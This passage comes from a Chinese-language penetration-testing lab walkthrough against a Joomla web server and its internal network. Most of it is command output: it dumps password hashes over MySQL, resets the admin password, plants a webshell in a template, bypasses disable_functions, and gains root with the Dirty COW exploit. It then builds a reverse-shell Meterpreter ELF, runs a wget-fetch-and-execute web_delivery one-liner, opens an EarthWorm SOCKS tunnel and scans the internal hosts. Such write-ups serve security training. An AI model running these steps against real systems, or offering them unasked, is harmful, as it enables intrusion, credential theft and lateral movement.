         Explorable Directory    > http://192.168.1.21/components/com_users/
         Explorable Directory    > http://192.168.1.21/administrator/components/com_users/
Component found: com_wrapper     > http://192.168.1.21/index.php?option=com_wrapper
         LICENSE file found      > http://192.168.1.21/components/com_wrapper/wrapper.xml
         Explorable Directory    > http://192.168.1.21/components/com_wrapper/
End Scanner

6、joomscan perl脚本

    perl joomscan.pl -u 192.168.1.21
    
    
    
    ____  _____  _____  __  __  ___   ___    __    _  _ 
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  ( 
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)
   
    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.1.21 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.12

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.1.21/administrator/components
http://192.168.1.21/administrator/modules
http://192.168.1.21/administrator/templates
http://192.168.1.21/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.1.21/administrator/                                                                                    
                                                                                                                                        
[+] Checking robots.txt existing                                                                                                        
[++] robots.txt is found                                                                                                                
path : http://192.168.1.21/robots.txt                                                                                                   
                                                                                                                                        
Interesting path found from robots.txt                                                                                                  
http://192.168.1.21/joomla/administrator/                                                                                               
http://192.168.1.21/administrator/                                                                                                      
http://192.168.1.21/bin/                                                                                                                
http://192.168.1.21/cache/                                                                                                              
http://192.168.1.21/cli/                                                                                                                
http://192.168.1.21/components/                                                                                                         
http://192.168.1.21/includes/                                                                                                           
http://192.168.1.21/installation/                                                                                                       
http://192.168.1.21/language/                                                                                                           
http://192.168.1.21/layouts/                                                                                                            
http://192.168.1.21/libraries/                                                                                                          
http://192.168.1.21/logs/                                                                                                               
http://192.168.1.21/modules/                                                                                                            
http://192.168.1.21/plugins/                                                                                                            
http://192.168.1.21/tmp/                                                                                                                
                                                                                                                                        
                                                                                                                                        
[+] Finding common backup files name                                                                                                    
[++] Backup files are not found                                                                                                         
                                                                                                                                        
[+] Finding common log files name                                                                                                       
[++] error log is not found                                                                                                             
                                                                                                                                        
[+] Checking sensitive config.php.x file                                                                                                
[++] Readable config file is found                                                                                                      
 config file path : http://192.168.1.21/configuration.php~                                                                              
                                                                                                                                        
                                                                                                                                        
                                                                                                                                        
Your Report : reports/192.168.1.21/ 

看来行不通,那么现在我们只能远程登录到靶机的MySQL中。

MySQL

1、远程登录

┌──(root?ru)-[~]
└─# mysql -u testuser -h 192.168.1.21 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 4306
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.001 sec)


2、查看敏感数据

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.001 sec)

MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| am2zu_action_log_config       |
| am2zu_action_logs             |
| am2zu_action_logs_extensions  |
| am2zu_action_logs_users       |
| am2zu_assets                  |
| am2zu_associations            |
| am2zu_banner_clients          |
| am2zu_banner_tracks           |
| am2zu_banners                 |
| am2zu_categories              |
| am2zu_contact_details         |
| am2zu_content                 |
| am2zu_content_frontpage       |
| am2zu_content_rating          |
| am2zu_content_types           |
| am2zu_contentitem_tag_map     |
| am2zu_core_log_searches       |
| am2zu_extensions              |
| am2zu_fields                  |
| am2zu_fields_categories       |
| am2zu_fields_groups           |
| am2zu_fields_values           |
| am2zu_finder_filters          |
| am2zu_finder_links            |
| am2zu_finder_links_terms0     |
| am2zu_finder_links_terms1     |
| am2zu_finder_links_terms2     |
| am2zu_finder_links_terms3     |
| am2zu_finder_links_terms4     |
| am2zu_finder_links_terms5     |
| am2zu_finder_links_terms6     |
| am2zu_finder_links_terms7     |
| am2zu_finder_links_terms8     |
| am2zu_finder_links_terms9     |
| am2zu_finder_links_termsa     |
| am2zu_finder_links_termsb     |
| am2zu_finder_links_termsc     |
| am2zu_finder_links_termsd     |
| am2zu_finder_links_termse     |
| am2zu_finder_links_termsf     |
| am2zu_finder_taxonomy         |
| am2zu_finder_taxonomy_map     |
| am2zu_finder_terms            |
| am2zu_finder_terms_common     |
| am2zu_finder_tokens           |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types            |
| am2zu_languages               |
| am2zu_menu                    |
| am2zu_menu_types              |
| am2zu_messages                |
| am2zu_messages_cfg            |
| am2zu_modules                 |
| am2zu_modules_menu            |
| am2zu_newsfeeds               |
| am2zu_overrider               |
| am2zu_postinstall_messages    |
| am2zu_privacy_consents        |
| am2zu_privacy_requests        |
| am2zu_redirect_links          |
| am2zu_schemas                 |
| am2zu_session                 |
| am2zu_tags                    |
| am2zu_template_styles         |
| am2zu_ucm_base                |
| am2zu_ucm_content             |
| am2zu_ucm_history             |
| am2zu_update_sites            |
| am2zu_update_sites_extensions |
| am2zu_updates                 |
| am2zu_user_keys               |
| am2zu_user_notes              |
| am2zu_user_profiles           |
| am2zu_user_usergroup_map      |
| am2zu_usergroups              |
| am2zu_users                   |
| am2zu_utf8_conversion         |
| am2zu_viewlevels              |
| umnbt_action_log_config       |
| umnbt_action_logs             |
| umnbt_action_logs_extensions  |
| umnbt_action_logs_users       |
| umnbt_assets                  |
| umnbt_associations            |
| umnbt_banner_clients          |
| umnbt_banner_tracks           |
| umnbt_banners                 |
| umnbt_categories              |
| umnbt_contact_details         |
| umnbt_content                 |
| umnbt_content_frontpage       |
| umnbt_content_rating          |
| umnbt_content_types           |
| umnbt_contentitem_tag_map     |
| umnbt_core_log_searches       |
| umnbt_extensions              |
| umnbt_fields                  |
| umnbt_fields_categories       |
| umnbt_fields_groups           |
| umnbt_fields_values           |
| umnbt_finder_filters          |
| umnbt_finder_links            |
| umnbt_finder_links_terms0     |
| umnbt_finder_links_terms1     |
| umnbt_finder_links_terms2     |
| umnbt_finder_links_terms3     |
| umnbt_finder_links_terms4     |
| umnbt_finder_links_terms5     |
| umnbt_finder_links_terms6     |
| umnbt_finder_links_terms7     |
| umnbt_finder_links_terms8     |
| umnbt_finder_links_terms9     |
| umnbt_finder_links_termsa     |
| umnbt_finder_links_termsb     |
| umnbt_finder_links_termsc     |
| umnbt_finder_links_termsd     |
| umnbt_finder_links_termse     |
| umnbt_finder_links_termsf     |
| umnbt_finder_taxonomy         |
| umnbt_finder_taxonomy_map     |
| umnbt_finder_terms            |
| umnbt_finder_terms_common     |
| umnbt_finder_tokens           |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types            |
| umnbt_languages               |
| umnbt_menu                    |
| umnbt_menu_types              |
| umnbt_messages                |
| umnbt_messages_cfg            |
| umnbt_modules                 |
| umnbt_modules_menu            |
| umnbt_newsfeeds               |
| umnbt_overrider               |
| umnbt_postinstall_messages    |
| umnbt_privacy_consents        |
| umnbt_privacy_requests        |
| umnbt_redirect_links          |
| umnbt_schemas                 |
| umnbt_session                 |
| umnbt_tags                    |
| umnbt_template_styles         |
| umnbt_ucm_base                |
| umnbt_ucm_content             |
| umnbt_ucm_history             |
| umnbt_update_sites            |
| umnbt_update_sites_extensions |
| umnbt_updates                 |
| umnbt_user_keys               |
| umnbt_user_notes              |
| umnbt_user_profiles           |
| umnbt_user_usergroup_map      |
| umnbt_usergroups              |
| umnbt_users                   |
| umnbt_utf8_conversion         |
| umnbt_viewlevels              |
+-------------------------------+
156 rows in set (0.001 sec)

MySQL [joomla]>

MySQL [joomla]> select username,0x3a,password from umnbt_users;
+----------+------+--------------------------------------------------------------+
| username | 0x3a | password                                                     |
+----------+------+--------------------------------------------------------------+
| admin    | :    | $2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy |
+----------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)

MySQL [joomla]> select username,0x3a,password from am2zu_users;
+---------------+------+--------------------------------------------------------------+
| username      | 0x3a | password                                                     |
+---------------+------+--------------------------------------------------------------+
| administrator | :    | $2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy |
+---------------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)

使用mysql命令进行修改

update am2zu_users set password = md5("root") where id = 891;



在这两个账号的前面有一个super user 的标注。说明这两个账号很可能具有最高权限,我们直接修改administrator 账号的密码为root,当然root一定要加密为MD5值。

登录后台

1、成功登录



全部登录上去,都是用adminstrator用户。

2、RCE漏洞

https://www.cnblogs.com/starci/p/15174896.htmlicon-default.png?t=N7T8https://www.cnblogs.com/starci/p/15174896.html




点击“option”,修改Path to Files Folder路径为当前路径“./”
可以看到这里可以操作整个web目录下的文件夹及文件,实现了目录遍历。


在这我们通过修改文件进行命令执行。我们尝试另外一种方式。

蚁剑连接

1、写入shell



根据资料收集,默认的执行路径是 http://localhost/templates/beez3/*.php 

我们只需要在这里面写入木马即可。




路径就是这样,我们利用后台有的php代码文件进行插入木马。

GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCEcom_media allowed paths that are not intended for image uploads to RCE - GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCEicon-default.png?t=N7T8https://github.com/HoangKien1020/CVE-2021-23132




测试成功,接下来就可以进行写马了。



2、disable_functions函数绕过



在蚁剑上使用命令,发现不能使用,经过排查,发现禁用了很多参数。那么只能采用绕过的方式了。可以在github上搜索相应的exp,也可以使用蚁剑的插件,进行 disable_functions 绕过。

GitHub - l3m0n/Bypass_Disable_functions_Shell: 一个各种方式突破Disable_functions达到命令执行的shell一个各种方式突破Disable_functions达到命令执行的shell. Contribute to l3m0n/Bypass_Disable_functions_Shell development by creating an account on GitHub.icon-default.png?t=N7T8https://github.com/l3m0n/Bypass_Disable_functions_Shell




上下两个都可以试试。




(www-data:/etc) $ netstat -anlpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44095    ESTABLISHED -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44093    TIME_WAIT   -               
tcp6       0      0 192.168.93.120:80       192.168.93.100:44094    TIME_WAIT   -  

我们看到的ip是192.168.93.120,而不是192.168.1.21,说明这里存在一个反向代理,把我们的流量代理到了192.168.93.120这个IP上。现在我们需要去拿下外网主机。说明是IP为192.168.93.100为外网转发流量主机。


我们在tmp目录下找到了test.txt文件。获得了账号以及密码。

adduser wwwuser
passwd wwwuser_123Aqx

SSH连接

┌──(root?ru)-[~/lianxi]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss wwwuser@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
RSA key fingerprint is SHA256:pVIGFsCgpYpKxtt43DtcC9NUBpUvyNCfIitNR9UsPRA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (RSA) to the list of known hosts.
wwwuser@192.168.1.21's password:
Last login: Sun Oct  6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ id
uid=500(wwwuser) gid=500(wwwuser) 组=500(wwwuser) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[wwwuser@localhost ~]$


[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ find / -perm -u=s f 2>/dev/null
[wwwuser@localhost ~]$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/sudo
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
[wwwuser@localhost ~]$

脏牛提权复现以及如何得到一个完全交互的shell - 先知社区先知社区,先知安全技术社区icon-default.png?t=N7T8https://xz.aliyun.com/t/9757


经过探索,发现主机可以进行内核提权,而且主机的内核在脏牛漏洞的影响范围内。

提权

┌──(root?ru)-[~/tools/loudong/zangniu]
└─# php -S 0:8080                                
[Sat Dec  2 17:53:11 2023] PHP 8.2.7 Development Server (http://0:8080) started


[wwwuser@localhost tmp]$ wget http://192.168.1.20:8080/dirty.c
--2019-10-07 10:12:15--  http://192.168.1.20:8080/dirty.c
正在连接 192.168.1.20:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4815 (4.7K) [text/x-c]
正在保存至: “dirty.c”

100%[======================================>] 4,815       --.-K/s   in 0s

2019-10-07 10:12:15 (21.0 MB/s) - 已保存 “dirty.c” [4815/4815])

[wwwuser@localhost tmp]$ ls
dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ chmod +x dirty.c
[wwwuser@localhost tmp]$


[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ ./dirty
File /tmp/passwd.bak already exists! Please delete it and run again
[wwwuser@localhost tmp]$ cd /home
[wwwuser@localhost home]$ ls
wwwuser
[wwwuser@localhost home]$ cd wwwuser
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ cp /tmp/passwd.bak .
[wwwuser@localhost ~]$ ls
passwd.bak
[wwwuser@localhost home]$ cd /tmp


[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$ rm passwd.bak
[wwwuser@localhost tmp]$ clear
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  yum.log
[wwwuser@localhost tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:  (ls)
Complete line:
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash

mmap: 7f18ff557000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'ls'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ ls
dirty  dirty.c  passwd.bak  yum.log
[wwwuser@localhost tmp]$


┌──(root?ru)-[~/tools/loudong/zangniu]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss firefart@192.168.1.21
firefart@192.168.1.21's password: 
Last login: Sun Oct  6 20:25:55 2019 from 192.168.1.122
[firefart@localhost ~]# whoami
firefart
[firefart@localhost ~]# cd /root
[firefart@localhost ~]# ls
anaconda-ks.cfg  install.log  install.log.syslog  nginx-1.9.4  nginx-1.9.4.tar.gz
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]# 


至此外网打点结束,成功利用脏牛提权。那么下一步只需要进行横向渗透即可。

内网渗透

横向渗透1

1、生成木马文件

msfvenom -p linux/x64/meterpreter/reverse_tcp lhosts=192.168.1.25 lport=1111 SessionCommunication Timeout=0 SessionExpiration Timeout=0 -f elf -o shell.elf


使用msfvenom来生成一个 Linux x64 平台上的 Meterpreter 反向 shell。
然后生成的反向 shell 的配置是将 Meterpreter shell 连接到本地 IP 地址为 192.168.1.25,端口为 1111 的目标主机上。
此外,还设置了会话的通信超时和过期超时时间都为 0,这意味着会话将一直保持存活,直到它们被显式终止。


-p : 指定payload

lhosts=192.168.1.25 lport=1111  : 指定监听主机

SessionCommunication Timeout=0 : 指定会话的通信超时为0

SessionExpiration Timeout=0 : 指定会话的过期超时时间为0

-f elf  : 指定文件得类型

-o shell.elf : 指定输出为shell.elf


2、开启监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

lhosts => 192.168.1.25
msf6 exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.25     yes       The listen address (an interface may be specified)
   LPORT  1111             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp


[firefart@localhost tmp]# wget http://192.168.1.25/shell.elf
--2019-10-07 11:03:06--  http://192.168.1.25/shell.elf
正在连接 192.168.1.25:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”

100%[======================================>] 250         --.-K/s   in 0s

2019-10-07 11:03:06 (46.8 MB/s) - 已保存 “shell.elf” [250/250])

[firefart@localhost tmp]# ls
dirty  dirty.c  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# chmod +x shell.elf
[firefart@localhost tmp]# ./shell.elf


msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.25:1111
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.25:1111 -> 192.168.1.21:36214) at 2023-12-03 09:17:39 +0800

meterpreter > getuid
Server username: firefart


3、添加内网路由

查看内网路由


meterpreter > run get_local_subnets   //查看子网范围

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.93.0/255.255.255.0

meterpreter > run autoroute -s 192.168.93.0/24  //添加内网路由
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.1.21
[*] Use the -p option to list all active routes

meterpreter > run autoroute -p  //查看当前meterpreter的路由表
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.93.0       255.255.255.0      Session 1



横向渗透2

1、建立监听

use exploit(multi/script/web_delivery  

......

msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.25:4444
[*] Using URL: http://192.168.1.25/0796Iv35A4
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[*] 192.168.1.21     web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 4 opened (192.168.1.25:4444 -> 192.168.1.21:41080) at 2023-12-04 08:26:03 +0800

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
  
  
  
  
  Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.25     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   7   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) >


[firefart@localhost tmp]# wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[1] 12342


2、进入meterpreter

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  4         meterpreter x64/linux  firefart @ localhost.localdomain  192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)


msf6 exploit(multi/script/web_delivery) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: firefart
meterpreter >


3、添加内网路由

meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  4         meterpreter x64/linu  firefart @ localhost.  192.168.1.25:4444 ->
            x                     localdomain            192.168.1.21:41080 (1
                                                         92.168.1.21)

msf6 exploit(multi/script/web_delivery) >


msf6 exploit(multi/script/web_delivery) > route add 192.168.93.0 255.255.255.0 4[*] Route already exists 
msf6 exploit(multi/script/web_delivery) >

# 目的网段 192.168.93.0 子网掩码 255.255.255.0 下一跳地址 session 4

4、socks5代理

上述的内网渗透,建立监听操作都是在msfconsole视图下完成的,路由转发只能将msfconsole带进内网,但是想要将攻击机其他程序也带进内网还需要搭建socks代理。

使用earthworm搭建socks5反向代理

1、earthworm内网穿透工具
./ew_for_linux64 -s rcsocks -l 9898 -e 6767
  #将9898端口监听到的本地数据转发到 web服务器的6767端口
  # 通过9898端口,将本地流量转发出去
  #rcsocks、rssocks 用于反向连接
  #ssocks 用于正向连接
  # -l 指定本地监听的端口
  # -e 指定要反弹到的机器端口
  # -d 指定要反弹到机器的IP
  # -f 指定要主动连接的机器 ip
  # -g 指定要主动连接的机器端口
  # -t 指定超时时长,默认为 1000

^C[firefart@localhost tmp]# ls
dirty  dirty.c  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# wget http://192.168.1.25:8080/ew_for_linux64
--2019-10-07 13:22:27--  http://192.168.1.25:8080/ew_for_linux64
正在连接 192.168.1.25:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:28080 (27K) [application/octet-stream]
正在保存至: “ew_for_linux64”

100%[================================================================================================================================================================================================================>] 28,080      --.-K/s   in 0.001s

2019-10-07 13:22:27 (34.7 MB/s) - 已保存 “ew_for_linux64” [28080/28080])

[firefart@localhost tmp]# ls
dirty  dirty.c  ew_for_linux64  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]# chmod +x ew_for_linux64
[firefart@localhost tmp]# ls
dirty  dirty.c  ew_for_linux64  passwd.bak  shell.elf  yum.log
[firefart@localhost tmp]#


┌──(root?ru)-[~/…/neiwang/EarthWorm/download/products]
└─# ./ew_for_linux64 -s rcsocks -l 9898 -e 6767
rcsocks 0.0.0.0:5656 <--[10000 usec]--> 0.0.0.0:6767
init cmd_server_for_rc here
start listen port here
rssocks cmd_socket OK!

[firefart@localhost tmp]# ./ew_for_linux64 -s rssocks -d 192.168.1.25 -e 6767
rssocks 192.168.1.25:6767 <--[10000 usec]--> socks server



2、配置proxychains4.conf文件
┌──(root?ru)-[~/lianxi]
└─# cat /etc/proxychains4.conf | grep "socks5"
#               socks5  192.168.67.78   1080    lamer   secret
#       proxy types: http, socks4, socks5, raw
#socks5         127.0.0.1 2222
#socks5   116.211.207.100 8080
socks5          127.0.0.1 9898


将socks5服务器指向9898端口,然后端口有9898把本地流量转发到6767端口,然后6767端口就会把我们本地流量带到内网中,之后我们就可以利用proxychains将我们的程序代理进入内网了

5、内网主机发现

1、第一种模块
msf6 exploit(multi/script/web_delivery) > use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > show options

Module options (auxiliary/scanner/discovery/udp_probe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/discovery/udp_probe) > set rhost 192.168.93.0-255
rhost => 192.168.93.0-255
msf6 auxiliary(scanner/discovery/udp_probe) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/discovery/udp_probe) >


msf6 auxiliary(scanner/discovery/udp_probe) > run

[-] Unknown error: 192.168.93.0:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :WIN-8GA56TNV3MV:<20>:U :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a16634c4f434ce9179267a83fa2adc54f234b71b152f3e917aaa60c16aceae917aaa60c16acea)
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[*] Scanned  26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
